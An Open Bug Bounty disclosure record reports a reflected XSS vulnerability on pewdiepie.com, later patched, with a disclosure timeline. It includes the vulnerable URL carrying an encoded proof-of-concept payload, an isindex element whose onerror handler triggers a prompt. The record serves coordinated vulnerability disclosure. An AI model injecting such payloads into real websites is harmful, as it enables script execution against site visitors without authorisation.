pewdiepie.com XSS vulnerability

2016-03-31T19:12:00
ID OBB:144186
Type openbugbounty
Reporter RootByte
Modified 2017-06-17T06:09:00

Description

Vulnerable URL:
http://www.pewdiepie.com/video/0%3Cisindex%20type%3dimage%20src%3d1%20onerror%3dprompt%28'XSSPOSED'%29%3EYDpouL80Zsw/search/the/page/0
Details:

Description| Value
---|---
Patched:| Yes, at 16.06.2017
Latest check for patch:| 16.06.2017 12:56 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 94343
Google Pagerank| 0
VIP website status:| No
Check pewdiepie.com SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 31 March, 2016 19:12 GMT
Generic security notifications sent to website owner| 31 March, 2016 19:14 GMT
Notification sent to subscribers (without technical details)| 31 March, 2016 22:17 GMT
Vulnerability details disclosed by researcher| 23 June, 2016 20:11 GMT
Vulnerability patched by the website owner| 17 June, 2017 06:09 GMT